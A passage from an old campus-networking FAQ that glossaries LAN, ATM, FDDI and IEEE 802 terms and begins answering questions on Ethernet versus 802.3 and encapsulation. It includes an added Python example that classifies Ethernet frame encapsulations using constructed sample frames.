             Ethernet, called 100BASE-TX, 100BASE-TF, and 100BASE-T4.  A
             medium-independent interface and an adaptor are planned (to be
             used like the AUI and MAU of 10Mbps 802.3).  This is being
             developed & promoted by the Fast Ethernet Alliance.
      
           100BASE-T4 - Proposed IEEE 802.3 standard for a 100Mbps
             Ethernet-like network.  One of the flavors of "100BASE-T"
             proposed by the Fast Ethernet Alliance.  Uses 8B6T encoding and
             25MHz clocking, and in addition to the two pairs traditionally
             used in the manner of 10BASE-T, also has two pairs used in
             bidirectional half-duplex fashion.  Among other things, this
             means that this particular kind of Ethernet cannot be made full
             duplex without the use of more pairs.  Formerly called 4T+.
      
           100BASE-TF - A proposal to IEEE 802.3 for a 100Mbps Ethernet-like
             network.  Borrows the physical characteristics of FDDI's
             multimode fiber PMD, but uses Ethernet framing & CSMA/CD.  One
             of three flavors of "100BASE-T" proposed by the Fast Ethernet
             Alliance.  Formerly part of 100BASE-X proposal.
      
           100BASE-TX - A proposal to IEEE 802.3 for a 100Mbps Ethernet-like
             network.  Borrows the physical characteristics of FDDI's TP-PMD,
             but uses Ethernet framing & CSMA/CD.  One of three
             flavors of "100BASE-T" proposed by the Fast Ethernet Alliance.
             Formerly part of 100BASE-X proposal.
      
           100BASE-X - Old name for 100BASE-TF and 100BASE-TX.
      
           100Mbps Copper UNI - ATM Forum UNI specification for 100Mbps over
             some sort of copper cable.  I believe it is just 100Mbps UNI
             making use of FDDI's TP-PMD rather than the older fiber PMD.
      
           100Mbps UNI - ATM Forum 100Mbps multimode fiber private UNI.  Same
             as Fore's TAXI.  Borrows optical characteristics & basic
             encoding of FDDI.
      
           100VG-AnyLAN - "100VG-AnyLAN": Originally a proposal to IEEE 802.3
             for a 100Mbps Ethernet-like network, later relegated to IEEE
             802.12.  Formerly known as 100BASE-VG.  Uses Demand Priority
             media access method and Quartet Signaling.  I've also seen
             reference to its ability to use Category 4 UTP, Category 5 UTP,
             and STP, but I don't know how many pairs.
      
           100VG-AnyLAN Forum - Group of vendors trying to accelerate
             100VG-AnyLAN acceptance & interoperability.
      
           10BASE-F - Three variants of IEEE 802.3 which run over multimode
             fiber.  See 10BASE-FB, 10BASE-FP, and 10BASE-FL.
      
           10BASE-FB - IEEE 802.3 10BASE-FB: "Synchronous Ethernet" which is
             a special-purpose multimode fiber link for linking repeaters
             that allows the repeaters to communicate more efficiently, thus
             enlarging the count of repeaters that can be placed in series
             above the traditional 4.  Described in IEEE 802.3 Section 17.
      
           10BASE-FL - IEEE 802.3 10BASE-FL: multimode fiber Ethernet used to
             attach a pair of devices (each being either a host or a
             repeater) as a "Link Segment"--a lot like 10BASE-T except that
             it uses fiber.  It makes FOIRL obsolete.  10BASE-FL transceivers
             can interoperate with FOIRL transceivers.  It is described in
             IEEE 802.3 Section 18.
      
           10BASE-FP - IEEE 802.3 10BASE-FP: passive star fiber Ethernet.
             Attaches a number of Ethernet devices together with a passive
             star hub (i.e., the hub is not electronic--it just splits the
             light travelling through each incoming fiber to go out all the
             outgoing fibers).  It is described in IEEE 802.3 Section 16.
      
           10BASE-T - A variant of IEEE 802.3 which allows stations to be
             attached via twisted-pair cable.
      
           155Mbps UNI - ATM Forum 155Mbps private UNI.  In two flavors:
             multimode and shielded twisted-pair.  The multimode version is
             incompatible with STS3cUNI.  This version is for private
             networks only and presumably will be less expensive.  I heard
             that a C5 version has been proposed.
      
           25Mbps UNI - IBM-proposed copper interface for ATM that so far has
             been rejected by the ATM Forum.  IBM's proposal borrows
             some of Token Ring's signaling characteristics.  I've read the
             statement that the ATM Forum doesn't support this proposal.
      
           4T+ - Old name for 100BASE-T4.
      
           51Mbps UNI - I don't know the actual name.  ATM Forum 51Mbps UNI
             for Category 3 UTP.  Uses AT&T's 16-CAP (a 16 constellation
             modem-type modulation scheme) line coding to transmit the
             signal.  The transmission convergence layer (framing) conforms
             to the STS-1 SONET standard.
      
           802, 802.x - see IEEE 802, IEEE 802.x.
      
           ANSI "American National Standards Institute" - A definer of
             standards of all kinds, including FDDI.
      
           ANSI X3 - ANSI group developing standards for information
             processing.
      
           ANSI X3T9 - ANSI group within X3 developing standards for I/O
             interfaces.
      
           ANSI X3T9.3 Committee - ANSI group within X3T9 standardizing HiPPI.
      
           ANSI X3T9.5 Committee - ANSI group within X3T9 that standardized
             FDDI, PMD, SMF-PMD, and is standardizing TP-PMD and LCF-PMD.
      
           AppleTalk - A protocol family developed by Apple Computer to
             implement LANs serving Macintoshes.
      
           ATM "Asynchronous Transfer Mode" - a method for switching little
             fixed-size packets (cells) around.  Like T1 and DS3, digitized
             voice was a major consideration in its design, but it can be
             used for data.  It can be run at different speeds over different
             media including T1 and DS3 as well as 51Mbps, 100Mbps, 155Mbps
             and 622Mbps standards (see SONET & TAXI).  The fixed cell size
             is 53 bytes.  Though ATM is really designed for voice and WANs,
             there are schemes to use it in LANs.  ATM is a big buzzword
             these days but it is still very new.
      
           ATM Forum - Non-profit international industry consortium chartered
             to accelerate ATM acceptance & interoperability.
      
           AUI "Attachment Unit Interface" - the Ethernet/IEEE 802.3 term for
             the interface between a MAU and a station.  A special kind of
             cable known as an "AUI Cable" can attach a MAU to a station at a
             distance (up to 50 meters).
      
           Backbone - a fairly nebulous term for a part of the network that
             interconnects other parts of the network.  For example, a campus
             might have an FDDI ring that interconnects a number of
             Ethernets.  The FDDI ring could be called the network's
             backbone.
      
           BNC Connector "Bayonet Neill-Concelman connector" - a type of
             connector used for attaching coax cable to electronic equipment
             which can be attached or detached quicker than connectors that
             screw.  ThinWire Ethernet (IEEE 802.3 10BASE2) uses BNC
             connectors.
      
           Bridge - A network "relay" which reads, buffers, and sends data to
             relay it from one data link to another, but makes the two data
             links appear as one to levels higher than the data link layer.
      
           Category 3 Unshielded Twisted Pair - standardization of unshielded
             twisted pair cable for voice use.  Some data communications
             standards such as 10BASE-T can utilize it.
      
           Category 4 Unshielded Twisted Pair - standardization of unshielded
             twisted pair cable.
      
           Category 5 Unshielded Twisted Pair - standardization of unshielded
             twisted pair cable for data use.  TP-PMD requires Category
             5 cable rather than Category 3.
      
           CDDI "Copper Data Distribution Interface" - Commonly used term
             for TP-PMD, but actually a trade name of Crescendo.
      
           Cell - An ATM 53-byte cell.  Note: there are various proposals for
             how typical packets will be broken into cells and restored.
      
           Cell Switching - a term for ATM-style networks.  See "ATM".
      
           CMIP "Common Management Information Protocol" - An OSI protocol
             for management of network equipment.  Not widely implemented.
             See SNMP.
      
           CMOT "CMIP over TCP/IP" - A protocol consisting of CMIP running
             under TCP/IP.  An alternative to SNMP.
      
           Coaxial Cable - any of a number of kinds of electrical
             communications cable designed so one conductor is in the center
             and the second conductor forms a ring around it.  Depending upon
             who you talk to, someone might have a specific kind of coaxial
             cable in mind.  Some well known kinds are various Cable TV
             cables, cables used by IBM 327x terminals and ARCNet, and cables
             used by Ethernet & IEEE 802.3.
      
           Collapsed Backbone - a network backbone that is located in a
             single room.  It might be a single router or multiport bridge,
             or a small LAN of some sort.  A typical collapsed-backbone-
             style campus LAN might consist of Ethernets in a number
             of buildings, each with a repeated fiber link into a single room
             at a central point where a router interconnects them.  An
             example of the opposite would be putting a router in each
             building and interconnecting them all with a big FDDI ring.
      
           Concentrator - a device which allows a number of stations to
             be connected to a LAN.  In the case of Ethernet, it is
             simply a multi-port repeater.  In the case of ring networks
             like Token Ring and FDDI, it acts as a switch which keeps
             the ring intact even if individual devices are unplugged.
      
           Counterrotating Ring - (see Ring, FDDI, Token Ring) a method of
             using two ring networks going in opposite directions to provide
             redundancy.  The network interfaces can change the path of the
             ring that the data flows around, thereby preserving the ring
             (thus the operation of the LAN) even if some of the cable is
             unplugged or cut, or if a device on the ring fails in such a way
             that it can't transmit data around the ring.
      
           DECNet - Trade name of Digital Equipment Corporation for some
             of their networking products.  It is a kind of network
             built out of Digital Equipment Corporation's own networking
             protocols (with some standard protocols also used).
      
           Dialup Modem - Modem used over ordinary dial-up telephone lines
             as opposed to private or leased lines.
      
           DS3 UNI - ATM Forum DS3 UNI, 44.236Mbps.  Also called HSSI?
      
           DXI - ATM Forum "Data Exchange Interface".
      
           Ethernet - LAN data-link protocol developed by a consortium
             of vendors; later standardized as IEEE 802.3 with a few
             modifications.  For many applications, users have not adopted
             all the IEEE 802.3 differences.  Ethernet/802.3 now can be
             run on two types of coaxial cable as well as multi-mode
             fiber and unshielded twisted-pair.  "Raw" rate of data
             transmission is 10 megabits/second.
      
           Fast Ethernet Alliance - Group of vendors working on a 100Mbps
             version of IEEE 802.3.  They intend to submit their proposals
             for approval by the IEEE for a new set of 802.3 standards called
             100BASE-T.
      
           FDDI "Fiber Data Distribution Interface" - LAN data-link protocol.
             Designed to run on multi-mode fiber.  "Raw" rate of data
             transmission is 100 megabits/second.  Developed by the American
             National Standards Institute.
      
           FDDI-2 - Same speed, same fiber, same basic protocol as FDDI.
             FDDI-2 adds a layer which allows you to allocate fixed bandwidth
             to applications of your choice, making it more like broadband.
             FDDI-2 is still rather new.
      
           FDSE - Full Duplex Ethernet: a variant of Switched Ethernet which
             does not use CSMA/CD, but uses slightly-modified network
             interface cards to send & receive packets simultaneously.
             Presumably based on 10BASE-T for most clients, and cannot be
             based on ThinWire or ThickWire Ethernet.
      
           Fiber - optical fiber: a very long, narrow, flexible piece of
             glass.  Used for high-speed communications.
      
           Fibre Channel - an ANSI standard to replace HiPPI.  It uses optical
             fiber instead of copper cables.  Speeds are up to roughly
             1Gbps.
      
           Fibre Channel Systems Initiative - Group of vendors trying to
             accelerate Fibre Channel acceptance & interoperability.  Members
             include: HP, IBM, Sun.
      
           Firewall Router - a router which blocks traffic according to
             various criteria for security--for example a router which
             allows no telnet to any host through one of its interfaces
             but allows ftp to a list of authorized hosts through the
             same interface.
      
           FOIRL "Fiber Optic Inter-Repeater Link" - a standard for running
             IEEE 802.3 over fiber, linking two devices (each either a host
             or a repeater) as a "Link Segment".  It has been replaced by
             10BASE-FL.
      
           FTP - Protocol in the "TCP/IP" family for copying files from
             one computer to another.  Stands for "File Transfer Protocol".
      
           Full Duplex Switched Ethernet Consortium - Group of vendors that
             are working out the details of FDSE.  Cabletron is a member.
      
           Full Duplex Token Ring - IBM scheme to add switching to token-ring
             hubs that would allow full-duplex linking to individual
             computers using modified token-ring adaptors.  Has the same
             wiring characteristics as token ring.
      
           Gateway - A type of "network relay" that attaches two networks
             to build a larger network.  Modern "narrow" usage is that it
             is one that translates an entire stack of protocols, e.g.,
             translates TCP/IP-style mail to ISO-style mail.  Older usage
             used it for other types of relays--in particular, in the "TCP/IP"
             world, it has been used to refer to what many now insist is
             a "router".
      
           GOSIP "Government Open Systems Interconnect Profile" - A subset of
             OSI standards specific to US Government procurements, designed
             to maximize interoperability in areas where plain OSI standards
             are ambiguous or allow options.  Theoretically, required of all
             US Government networking procurements since mid-1990.
      
           Heartbeat - In Ethernet (Version 2), a test of the collision
              functionality of the transceiver.  The term "Heartbeat" is often
             (wrongly) used interchangeably with "SQE" which is a similar
             function of IEEE 802.3.  See Question on SQE/Heartbeat below.
      
           HiPPI - "High Performance Parallel Interface", ANSI draft standard
             X3T9.3.
      
           HSSI "High Speed Serial Interface" -
      
           Hub - a nebulous term, typically applied to a multiport repeater
             or concentrator consisting of a chassis with slots to be
             populated by cards, allowing it to be configured with various
             numbers and combinations of LAN ports.  Vendors of networking
             equipment often also have other types of devices that can be
             inserted in the slots such as terminal servers, bridges,
             routers, gateways, etc.
      
           IEEE - Institute of Electrical & Electronic Engineers
      
           IEEE 802 - The set of IEEE standards for the definition of LAN
             protocols.  A story goes that a long time ago, IEEE and ANSI
             decided that IEEE would get the slow protocols and ANSI would
             get the fast ones, thus IEEE defined the 802 protocols and ANSI
             defined FDDI.  Presumably IEEE saw limited application for FDDI
             at the time.  Also, the IEEE standards-making committees
             associated with these standards.
      
            IEEE 802 - Group within IEEE that standardizes LAN technologies.
      
           IEEE 802.1 - The IEEE 802 standard for Network Management and
             Network Bridging of IEEE 802 networks.
      
           IEEE 802.11 - Proposed IEEE 802 group for wireless Ethernet.
      
           IEEE 802.12 - Group within IEEE 802 working on 100VG-AnyLAN.
      
           IEEE 802.2 - An IEEE standard for the portion of LAN data-link
             protocols that is the same for all flavors of IEEE LAN
             protocols, e.g.  802.3 and 802.5.  Sometimes not used.
      
           IEEE 802.3 - An IEEE standard for LANs--their "improved" version of
             Ethernet.  See Ethernet.
      
           IEEE 802.3 - Group within IEEE 802 that standardizes CSMA/CD LANs.
      
           IEEE 802.4 - An IEEE standard for LANs: Token Bus networks.
             Basically, standardizes MAP, a protocol that operates a Token
             Bus protocol on broadband.
      
           IEEE 802.5 - An IEEE standard for Token-Ring-based LANs.  There
             are two types: 4Mbps and 16Mbps.  See also "Token Ring".
      
           IEEE 802.6 - An IEEE standard for Metropolitan Area Networks.  Also
             known as DQDB.
      
           IEEE 802.7 - IEEE 802 technical advisory group on Broadband.
      
           IEEE 802.8 - IEEE 802 technical advisory group on FDDI & fiber
             optics.
      
           IEEE 802.9 - IEEE 802 group on integrated data & voice networks.
      
           IMAP "Internet Mail Access Protocol" - TCP/IP-based protocol
             similar to POP, but with additional function designed to handle
             storage of mail on the server rather than the client.  There are
             two versions in common use: IMAP2 and IMAP4.
      
           IPX - Novell's protocol used by Netware.  Utilizes part of XNS.  A
             router with "IPX routing" purports to interconnect LANs so that
             Novell Netware clients & servers can talk through the router.
      
           LCF-PMD - FDDI "Low-Cost Fiber" PMD.  Less expensive than PMD.  I
             don't believe it is common nor is it finished as a standard.
      
           MAU "Media Adaptor Unit" - an IEEE 802.3 or Ethernet device which
             attaches a station to the cable.  Popularly called a
             "transceiver".  Can be attached by cable to the station or built
             into the station.
      
           MIB "Management Information Base" - the set of parameters an SNMP
             management station can query or set in an SNMP agent (e.g.
             router).  Standard, minimal MIBs have been defined (MIB I, MIB
             II), and vendors often have custom entries.  In theory, any SNMP
             manager can talk to any SNMP agent with a properly defined MIB.
      
           Multimode fiber - A type of fiber mostly used for shorter, e.g.
             campus distances.  It can carry 100 megabits/second for typical
             campus distances, the actual maximum speed (given the right
             electronics) depending upon the actual distance.  It is easier
             to connect to than Single Mode Fiber, but its limit on speed x
             distance is lower.
      
           NFS "Network File System" - an IP-based protocol originally
             developed by Sun Microsystems which provides file services.
      
           OCx - (e.g. OC1, OC3) variants of SONET.
      
           OSI "Open System Interconnect" - A standard put forth by the ISO
             for communication between computer equipment and networks.
      
           OSI Reference Model - A model put forth by the ISO for
             communication between computer equipment and networks, which
             maps out 7 protocol layers.
      
             Top layer:    layer number 7:   application layer
                           layer number 6:   presentation layer
                           layer number 5:   session layer
                           layer number 4:   transport layer
                           layer number 3:   network layer
                           layer number 2:   data-link layer (e.g. IEEE 802.x)
             Bottom layer: layer number 1:   physical layer (wire &
                                              electricity)
      
             This model explains what each layer does.  The model is often
              used to explain anyone's protocols (not just OSI) to the point
             where many people seem to believe that true data-communications
             requires these 7 layers.
      
           PMD - FDDI "Physical Layer Medium Dependent" part.  When "PMD" is
             used by itself, it may refer to the usual kind of FDDI physical
             layer that uses multimode fiber.  Note that FDDI terminology
             also uses it as a more generic term, referring to different FDDI
             PMD's such as TP-PMD and SMF-PMD.
      
           POP "Post Office Protocol" - A TCP/IP-based protocol designed to
             allow client-stations (e.g. micros) to read mail from a server.
             There are three versions under the name "POP": POP, POP2, and
              POP3.  Later versions are NOT compatible with earlier
             versions.
      
           Protocol - The "rules" by which two network elements trade
             information in order to communicate.  Must include rules about a
             lot of mundane detail as well as rules about how to recover from
             a lot of unusual communication problems.  Thus they can be quite
             complicated.
      
           Relay - One terminology uses the term "relay" as a device that
             interconnects LANs, different kinds of relays being repeaters,
             bridges, routers, and gateways.
      
           Repeater - In the "Ethernet" world, a "relay" that regenerates and
             cleans up signals, but does no buffering of data packets.
             It can extend an Ethernet by strengthening signals, but timing
             limitations on Ethernets still limit their size.
      
           RFC "Request For Comments" - The name is a real red herring when
             it comes to Internet RFCs.  Some really are "Requests For
             Comments" but all Internet protocol documents are stamped with
             an RFC number that they never shake, so the acronym RFC
             generally refers to documents that describe protocols in the
             TCP/IP family.
      
            RG numbers (e.g. RG62; sometimes there are qualifiers, e.g. RG 58
              A/U) - a shorthand designation for military cable.  RG58 & RG62
             designate two different types of cable used by the military.
             Some data-communications equipment was designed to work with
             a particular military standard, e.g.  IBM 3270-type terminals
             use RG62.  In other cases, people use an RG-numbered cable
             that is close to what they need: for example ThinWire
             Ethernet & IEEE 802.3 10BASE2 define the type of cable they
             need and people sometimes substitute flavors of RG58, which
             are "close".  One can't recommend this practice because you
             can get yourself in trouble.  I think "RG" originally stood
             for "Radio Guide", presumably reflecting the fact that the
             series of cables was designed to handle radio frequencies.  The
             IEEE 802.3 10BASE2 specifications define two RG numbered cables
             (RG58 A/U and RG58 C/U) as meeting the cable requirements for
             thin Ethernet.  However, cable vendors may list a range of
             cables under these same RG numbers, and some of the cables
             listed may not meet the 802.3 specs.  You need to check the
             cable specifications closely, and beware of relying on the RG
             number alone when ordering network cables.
      
           Ring - A classification of network technology exemplified by
             Token Ring and FDDI.  The interconnected devices are connected
             one-to-another in the shape of a ring and data flows around
             it in one direction.  See also "Counterrotating Ring".
      
            RJ numbers ("Registered Jack" numbers, e.g. RJ11, RJ45) - numbers
             applied to types of connectors often used in UTP wiring.
             Borrowed from voice telecommunications industry.
      
           Router - A network "relay" that uses a protocol beyond the
             data-link protocol to route traffic between LANs and other
             network links.
      
           Routing Protocol - a protocol sent between routers by which
              routers exchange information on how to route to various parts
             of the network.  The TCP/IP family of protocols has a bunch,
             such as RIP, EGP, BGP, OSPF, and dual IS-IS.
      
           SDH "Synchronous Digital Hierarchy" - Similar to SONET, but used
             outside North America.  Some of the SDH and SONET standards are
             identical.  Standardized by the CCITT.
      
           Shielded Twisted Pair - a type of twisted-pair cable with a
             metallic shield around the twisted conductors.  The shield
             reduces the noise from the cable and reduces the effects of
             noise on the communications in the cable, but changes the
             electrical characteristics of the cable so some equipment
             optimized to non-shielded cable runs worse on shielded cable.
      
           Single Mode fiber - a type of fiber optic cable used for longer
             distances and higher speeds, e.g.  for long-distance telephone
             lines.  See also "Multimode Fiber".
      
           SMF-PMD - FDDI "Single-Mode Fiber" PMD.  Runs further than PMD.
      
           SMTP "Simple Mail Transfer Protocol" - the protocol in the
             TCP/IP family used to transfer electronic mail between
             computers.  It is not oriented towards a client/server system so
             other protocols (see "POP") are often used in that context.
             However, servers will use SMTP if they need to transfer a
             message to another server.
      
           SNMP "Simple Network Management Protocol" - Originally developed
             to manage IP based network equipment like routers and bridges,
             now extended to wiring hubs, workstations, toasters, jukeboxes,
             etc.  SNMP for IPX and AppleTalk under development.  Widely
             implemented.  See CMIP.
      
           SONET "Synchronous Optical Network" - A set of standard
             fiber-optic-based serial standards planned for use with ATM in
             North America.  Developed by Bellcore.  Different types of SONET
             run at different speeds (OC1 runs at 51Mbps, OC3 runs at
             155Mbps, OC12 runs at about 600Mbps, OC48 runs at over 2Gbps),
             and use different types of fiber (OC3 has several variants for
             use with different fibers & different distances; there are
             versions for both single mode and multimode fiber).
      
           SQE Test "Signal Quality Error Test" - an IEEE 802.3 function
             that tests the transceiver.  The term "SQE" is often (wrongly)
             used interchangeably with "Heartbeat" which is a similar
             function of Ethernet Version 2.  See Question on SQE/Heartbeat
             below.
      
           STP - Shielded Twisted Pair
      
           STS-3c UNI - ATM Forum SONET STS-3c UNI, 155.52Mbps.
      
           Switched Ethernet - really the same as Ethernet as far as
             standards go: acts like a very fast multiport Ethernet bridge
             giving an Ethernet to each station.  Presumably based on
             10BASE-T for most stations.
      
           Switched FDDI - really the same as FDDI as far as standards
             go: acts like a very fast multiport FDDI bridge.  Basically the
             DEC GigaSwitch.
      
           T1 - A phone-company standard for running 24 digitized voice
             circuits through one 1.5megabit/second digital channel.  Since
             phone companies run lots of T1, and will run T1 between customer
             sites, the standard is often used for data communications,
             either to provide 24 low-speed circuits, or to provide 1
             high-speed circuit, or to be divided other ways.
      
           TAXI - "Transparent Asynchronous Transmitter-Receiver Interface"
             Two ATM UNI specifications developed by Fore.  The slower one
             ran at 100Mbps and borrowed the physical characteristics of FDDI
             and has been adopted by the ATM Forum as its 100Mbps UNI
             specification.  The faster one ran at 140Mbps.
      
           TCP/IP "Transmission Control Protocol/Internet Protocol" -
             literally, two protocols developed for the Defense Data Network
             to allow their ARPANET to attach to other networks relatively
             transparently.  The name also designates the entire family of
             protocols built out of IP and TCP.  The Internet is based upon
             TCP/IP.
      
           TELNET - a protocol in the TCP/IP family that is used for
             "remote login".  The name is also often used as the name of the
             client program that utilizes the TELNET protocol.
      
           Terminal Server - a network device that allows a number of
             terminals to attach to a LAN, and do remote logins across the
             LAN.
      
           ThickWire - "ThickWire" Ethernet or IEEE 802.3 10BASE5.
      
           ThinWire - ThinWire Ethernet or IEEE 802.3 10BASE2.
      
           TN3270 - A variant of the TELNET program that allows one to
             attach to IBM mainframes and use the mainframe as if you had a
             3270 or similar terminal.
      
           Token Ring - People often use the term "Token Ring" to designate
             IEEE 802.5 (see above).  In the more general sense of the
             phrase, a token ring is a type of LAN that has stations wired in
             a ring, where each station constantly passes a special message
             (a "token") on to the next.  Whoever has the token can send a
             message.
      
           TP - "Twisted Pair".
      
           TP-PMD - FDDI "Twisted Pair Physical Layer Medium".  ANSI
             specification for FDDI-like service over UTP.  Being
             standardized by ANSI X3T9.5.  Was X3T9/93-130 X3T9.5/93-022
             TP-PMD/306 Rev 2.0, now there is a Rev 2.1.  Uses MLT-3 encoding
             instead of CDDI's NRZI encoding.
      
           Tunneling - An important concept in the design of many kinds of
             networks: taking some protocol-family's ability to move packets
             from user to user, or to open virtual-circuits between users,
             and use this as if it were a data-link protocol to run another
             protocol family's upper layers (or even the same protocol
             family's upper layers).  Examples: running TCP/IP over AppleTalk
             instead of something like Ethernet; running AppleTalk over
             DECNet instead of something like Localtalk or Ethernet.
      
           Twisted Pair - The type of wire used by the phone company to wire
             telephones -- at least over distances like between your house
             and the central office.  It has two conductors, which are
             twisted.  The twists are important: they give it electrical
             characteristics which allow some kinds of communications
             otherwise not possible.  Ordinary telephone cables are not
              shielded (see "Shielded Twisted Pair").
      
           Type1 - IBM Type 1 STP.  The most usual type of Shielded Twisted
             Pair in LAN communications.
      
           UNI - ATM Forum "User to Network Interface".  See ATM.
      
           UTP (Unshielded Twisted-Pair) -  See "Twisted-Pair" and "Shielded
             Twisted-Pair".
      
           X.400, X.500 - OSI protocols for mail and directory services.
      
        V. Frequently Asked Questions on Campus Networks
      
           It is hard to answer typical BIG-LAN questions in advance for two
           reasons.  Answers are often long and they are often
           controversial.  To provide some sort of objective information
           relevant to the controversies, a survey of BIG-LAN readers was
           taken on answers to various questions, so this memo could offer a
           sampling of opinions.  Note that the opinions below are extracted
           from the 41 responses received for the survey.  We can't say these
           41 responses represent a fair sampling of campus LAN
           administrators, but they do show some of the answers that you
           would get if you posed some of these questions to the BIG-LAN
           readership.
      
        1. What is the difference between Ethernet and IEEE 802.3?
      
           Ethernet ran through an evolution starting with some experimenting
           at Xerox, and ending with a standard published by Xerox, DEC, and
           Intel, which they offered to the world (with minimal royalties) as
           a standard technology for building LANs.  The Institute of
           Electrical & Electronic Engineers took this as a proposed
           standard, and rewrote the protocol description making some
           clarifications and a few changes.  Some of the changes have been
           universally adopted, and others have not.  After the first go
           round of IEEE standard defining, Ethernet version 2 was introduced
           which brought it more into line with standards.  The basic
           differences are:
      
                - Heartbeat vs SQE (see below)
                - Which pin in the MAU & AUI connectors carries the ground
                  conductor
                - Packet Length Field vs Type Field
      
           The latter issue is the one in which IEEE 802.3 has not displaced
           Ethernet.  Ethernet had a 16-bit field which defined the type of
           packet (examples: IP, XNS, AppleTalk).  The IEEE committee decided
           to use that field to specify the length of the packet, and have
           the data-portion of the packet define itself through the next
           higher level of protocol (e.g., IEEE 802.2).  However, the sets of
           possible values for that field used by the two different protocols
           are completely separate, and both protocols are designed to
           deliberately ignore packets with fields outside their own sets of
           values.  Thus Ethernet and IEEE 802.3 packets can coexist on the
           same cable, though a computer which expects to get packets
           belonging to just one of the protocols won't notice any packets
           sent according to the rules of the other (the expression used is
           "they pass by each other like ships in the night").
      
           These days, LANs use both.  There is a way to send TCP/IP packets
           via 802.3, but when 802.3 was introduced, there were already so
           many systems using the Ethernet rules that the use of
           Ethernet-style packets for TCP/IP has persisted now for years.
      
        2. What is encapsulation?  What do I have to know about it?
      
           One encapsulation issue on LANs is whether IEEE 802.3 packets are
           used or Ethernet packets are used to encapsulate your traffic on
           your IEEE 802.3/Ethernet LAN.  See previous question for more
            explanation.  Most TCP/IP systems use Ethernet; any that uses IEEE
           802.3 by default might surprise you by not interoperating with the
           rest of your TCP/IP network.
      
           A second encapsulation issue on IEEE 802.3/Ethernet networks is
           whether your Novell (IPX) packets use Novell's default
           encapsulation or whether they use Ethernet-style encapsulation.
           Novell, at least for a long time, had the distinction of using
           IEEE 802.3 as if it were the only protocol on the network, not
           following the rules for avoiding other protocols running under
           IEEE 802.3 rules.  They offered a utility called ECONFIG that
           changed Netware to use Ethernet rules, and use them properly, so
           Novell IPX packets could utilize the same LAN as other protocols.
           In no case would the Novell traffic bother Ethernet traffic-- only
           any other IEEE 802.3 traffic if ECONFIG wasn't used.  In any case,
           a single Ethernet segment, or bridged segments, had to have all
           Novell servers and clients configured the same, in order to
           interoperate.
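
            The type-versus-length field from question 1 and the Novell
            encapsulations described here can be told apart from the frame bytes
            alone.  The following is an added example, not part of the original
            memo: the boundary values 1500 and 0x0600 come from IEEE 802.3, the
            0xFFFF test for Novell's default encapsulation is the heuristic packet
            analyzers commonly use, and all sample frames are constructed.

```python
import struct
from collections import Counter

MAX_8023_LENGTH = 1500   # largest value that is a valid IEEE 802.3 length
MIN_ETHERTYPE = 0x0600   # smallest value that is a valid Ethernet type (1536)

# Well-known Ethernet type values, including the examples the FAQ names.
ETHERTYPES = {0x0600: "XNS", 0x0800: "IP", 0x0806: "ARP",
              0x809B: "AppleTalk", 0x8137: "IPX"}


def type_name(value):
    return ETHERTYPES.get(value, f"type 0x{value:04x}")


def classify(frame):
    """Return (encapsulation, protocol) for a frame without preamble or FCS."""
    if len(frame) < 14:
        raise ValueError("frame is shorter than the 14-byte MAC header")
    (field,) = struct.unpack("!H", frame[12:14])
    payload = frame[14:]

    # The two value sets do not overlap, so one comparison separates them.
    if field >= MIN_ETHERTYPE:
        return "ethernet", type_name(field)
    if field > MAX_8023_LENGTH:
        return "invalid", f"field 0x{field:04x} is neither length nor type"
    if field > len(payload):
        return "invalid", "802.3 length exceeds the data present"

    data = payload[:field]              # anything beyond this is padding
    # Novell's default encapsulation puts the IPX header (which starts with
    # the checksum 0xFFFF) directly after the length, with no 802.2 header.
    if data[:2] == b"\xff\xff":
        return "802.3-raw", "IPX"
    if len(data) < 3:
        return "invalid", "too short for an 802.2 header"
    dsap, ssap, control = data[0], data[1], data[2]
    # SNAP (DSAP/SSAP 0xAA) carries an Ethernet type inside 802.3; this is
    # how TCP/IP is sent via 802.3.
    if (dsap, ssap, control) == (0xAA, 0xAA, 0x03) and len(data) >= 8:
        (snap_type,) = struct.unpack("!H", data[6:8])
        return "802.3-snap", type_name(snap_type)
    return "802.3-llc", f"DSAP 0x{dsap:02x}"


def visible_to(frames, encapsulations):
    """Frames a station notices if it only handles the given encapsulations."""
    return [f for f in frames if classify(f)[0] in encapsulations]


def census(frames):
    """Count frames per encapsulation, e.g. to spot a mixed IPX configuration."""
    return Counter(classify(f)[0] for f in frames)


def build_frame(field, body):
    """Constructed test frame: broadcast destination, made-up source address."""
    header = bytes.fromhex("ffffffffffff") + bytes.fromhex("020000000001")
    return header + struct.pack("!H", field) + body.ljust(46, b"\x00")


# Constructed sample traffic (not captured from a real network).
IP_STUB = bytes([0x45]) + bytes(19)                          # 20-byte IP header
IPX_STUB = b"\xff\xff" + struct.pack("!H", 30) + bytes(26)   # 30-byte IPX header
SNAP_IP = bytes.fromhex("aaaa03000000") + struct.pack("!H", 0x0800) + IP_STUB
STP_LLC = bytes.fromhex("424203") + bytes(35)                # 802.2, bridge SAP

SAMPLE_FRAMES = {
    "ip_ethernet": build_frame(0x0800, IP_STUB),
    "ip_snap": build_frame(len(SNAP_IP), SNAP_IP),
    "ipx_raw": build_frame(len(IPX_STUB), IPX_STUB),
    "ipx_ethernet": build_frame(0x8137, IPX_STUB),
    "stp_llc": build_frame(len(STP_LLC), STP_LLC),
    "bad_field": build_frame(0x05F0, b""),
}

if __name__ == "__main__":
    for name, frame in SAMPLE_FRAMES.items():
        print(f"{name:13} {classify(frame)}")
    seen = visible_to(SAMPLE_FRAMES.values(), {"ethernet"})
    print("an Ethernet-only station notices", len(seen), "of", len(SAMPLE_FRAMES))
    print(dict(census(SAMPLE_FRAMES.values())))
```

            A census showing IPX under both "802.3-raw" and "ethernet" on one
            segment is the mixed configuration the paragraph above says will
            not interoperate.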
      
           A third encapsulation issue stems from Berkeley Unix 4.2, from
           which many versions of Unix and many TCP/IP implementations have
           been modeled.  It used, by default, its own encapsulation rules
           (i.e., manner of putting IP packets within Ethernet packets) which
           is termed "Trailer Encapsulation".  When an Ethernet had some
           computers using Trailer Encapsulation and some not, TCP/IP
           connections would often work, but hang when large data transfers
           were taking place.  The next version of Berkeley Unix, version
           4.3, remedied this by avoiding Trailer Encapsulation except when
           it was guaranteed to work correctly.
      
           A fourth encapsulation issue is "tunneling", which consists of
           one of the layers in the protocol stack mimicking another layer to
           provide a way of running a different set of upper layers than
           would otherwise be possible.  This is rather widely used and
           seldom explained to beginners.  It is perhaps best explained with
           an actual example:
      
           [Here put an example, perhaps AppleTalk over IP]
      
           [Include "encapsulated bridging" as a second example]
      
        3. How do I know whether to use a router or a bridge?
      
            (Note that the answer to this question is oriented to
